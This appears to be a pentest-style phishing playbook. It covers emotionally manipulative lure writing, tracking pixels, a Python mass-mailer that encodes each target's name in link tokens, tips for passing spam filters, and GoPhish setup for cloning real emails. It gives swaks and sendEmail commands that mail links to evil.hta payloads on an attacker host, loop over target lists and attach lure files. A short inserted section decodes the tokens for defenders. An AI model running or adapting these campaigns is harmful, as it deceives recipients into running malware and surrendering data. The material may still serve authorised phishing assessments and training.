Email Creation and Delivery

We need something that will temporarily engage them emotionally, but that will be completely forgotten the moment they close the website.

The email should not be over-punctuated and should not contain hidden links or uppercase text urging the recipient to click; it should casually invite them to click the link.

A tracking image allows us to track how many people have opened the message: every user viewing the message will fetch the image from our phishing server through the public relay.

Behind the scenes, the HTML code inserting the image reads as follows:

<img src="https://{website}/static/img/logo.png" alt="{target} logo" />

We will also personalize the landing page of our phishing site. Each link to the plug-in included in the email contains a unique tag to track targets once they are redirected to our phishing page. Example: https://website.com/plugin-coporate-offer/?utm_term=FAgUHRNXNj06FjtM

Data in the utm_term tag is the target's encrypted name. This allows us to provide a custom greeting like "Welcome Steve".

To generate this token from the username, we will apply a simple XOR operation in Python to the full name before sending the email (see the xor_string function in the Python script provided below).

We need a script that will loop through the employee names list, build the customized link by calling the xor_string function, include the link in the email, and send the email through the local Postfix server.

#!/usr/bin/python3

import smtplib, time, base64
from email.message import EmailMessage

# Include xor_string function
def xor_string(data):
    key = b"PibtwweIOwI8S6VElRHpm4w4L6vFYJWkPzxITZ5BRo"
    # XOR the name with the key byte by byte; zip() stops at the shorter input
    xored = bytes([a ^ b for a, b in zip(key, data.encode())])

    # base64.encodestring was removed in Python 3.9; encodebytes is its replacement
    return base64.encodebytes(xored).strip().decode()

# Email template with the company's logo (include link in href attribute)
email_template = """\
Hello,
--snip--
<a href='…..?utm_term={0}'></a>
--snip--
"""

# We take the list of names as input
with open("list_names.txt") as f:
    for target in f:
        target = target.strip()

        # Build the utm_term encrypted blob
        encrypted_name = xor_string(target)

        # Create message container
        msg = EmailMessage()
        msg["Subject"] = "Beta linter for our IDE"
        msg["From"] = '"Michael Han" <michael.han@buyed_domain.com>'

        # Create the body of the email
        body = email_template.format(encrypted_name)
        msg.add_alternative(body, subtype="html")

        with smtplib.SMTP("localhost") as s:
            s.send_message(msg)

        # Pause between messages
        time.sleep(2)
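
For responders, this token scheme is reversible from a single known recipient: XORing a token with the name it encodes exposes the key bytes, which then decode every other utm_term seen in proxy logs. This is an added example, not code from the original page; the proxy-log URLs and the two extra names are constructed, and the reported name is what the page's sample token decodes to under the page's key.

```python
import base64
from urllib.parse import urlparse, parse_qs

def _raw(token):
    # parse_qs turns '+' into a space; undo that before Base64-decoding.
    return base64.b64decode(token.replace(" ", "+"))

def recover_keystream(token, known_name):
    """XOR a token with the name it is known to encode to expose key bytes."""
    raw, name = _raw(token), known_name.encode()
    if len(raw) != len(name):
        raise ValueError("known name does not match token length")
    return bytes(a ^ b for a, b in zip(raw, name))

def decode_token(token, keystream):
    """Return (recovered text, count of trailing bytes beyond the keystream)."""
    raw = _raw(token)
    text = bytes(a ^ b for a, b in zip(raw, keystream)).decode("ascii", "replace")
    return text, max(0, len(raw) - len(keystream))

def triage(urls, keystream):
    """Map each utm_term found in proxy-log URLs to the name it carries."""
    hits = {}
    for url in urls:
        for token in parse_qs(urlparse(url).query).get("utm_term", []):
            hits[token] = decode_token(token, keystream)
    return hits

# The page's sample token and the name it decodes to, treated here as the
# recipient who reported the email (assumption for this example).
REPORTED_TOKEN = "FAgUHRNXNj06FjtM"
REPORTED_NAME = "David Stuart"

# Constructed proxy-log URLs; the encoded names are made up for this example.
PROXY_URLS = [
    "https://website.com/plugin-coporate-offer/?utm_term=EQULFxJXMiYhEA==",
    "https://website.com/plugin-coporate-offer/?utm_term=AgYAEQUDRQMuFCJLPFg=",
    "https://website.com/index.html",
]

if __name__ == "__main__":
    ks = recover_keystream(REPORTED_TOKEN, REPORTED_NAME)
    for token, (name, missing) in triage(PROXY_URLS, ks).items():
        extra = f" (+{missing} undecoded bytes)" if missing else ""
        print(f"{token} -> {name!r}{extra}")
```

Names longer than the known one decode only as far as the recovered key bytes reach; a second reported email with a longer name extends the keystream.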

Then we send a few test emails to our Gmail and Outlook addresses to make sure we pass their spam filters.

Phrases like free, click here, big opportunity, and similar will skyrocket the spam score.

We should also register the source email address we are using (michael.han@buyed_domain.com in this case) to allow replies. This is as simple as setting the forwarding setting in the DNS provider to a legit mailbox.

After running python send_mail.py, we inspect the Apache log file at /var/log/apache2/access.log looking for requests:

tail -f /var/log/apache2/access.log | grep logo_img.png

To just send an email:

sendEmail -f admin@target.com -t user@target.com -s {target IP} -u {subject} -m {message}

swaks --to Will@tricky.com --from ricky@bestcomputers.com --server 192.168.173.159 --header "Subject: Notification" --body "Click here: http://192.168.45.172/file.hta"

swaks --to Will@tricky.com --from ricky@bestcomputers.com --server 192.168.173.159 --header "Subject: Notification" --body "My resume is attached" -a Resume.doc

swaks --body 'Click here http://{my IP}/evil.hta' --add-header "MIME-Version: 1.0" --add-header "Content-Type: text/html" --header "Subject: Notification" -t user@target.com -f admin@target.com --server {target IP}

for i in `cat emails.txt`;do swaks --body 'Click here http://{my IP}/evil.hta' --add-header "MIME-Version: 1.0" --add-header "Content-Type: text/html" --header "Subject: Notification" -t $i -f admin@target.com --server {target IP}; done

sendEmail -f admin@megabank.com -t nico@megabank -u "IMPORTANT" -m "Look at this" -s 10.10.10.77:25 -a nudes.rtf

- GoPhish

GoPhish is an open-source phishing toolkit for phishing assessments. It allows launching phishing campaigns and getting real-time, centralized results. Phishing links can be embedded in templates, and integration with redirectors enhances its effectiveness for operations.

To use it, download it on the phishing server: https://github.com/gophish/gophish

To launch it:

sudo ./gophish

Now, in the GoPhish portal, phishing campaigns can be created.

To set up a Gmail sending profile, first create a Gmail app password in the Gmail account security settings. Then, in GoPhish, go to Sending Profiles > New Profile and set SMTP From: example@gmail.com, Host: smtp.gmail.com:587, Username: example@gmail.com, Password: *****, and check Ignore Certificate Errors.

For example, to send an email similar to a benign one, go to the original email received (for example, in Gmail), click on the three dots, then click on Show original and copy the content into GoPhish > Email Templates > New Template > Import Email. Now you can modify it with a malicious link or something else.
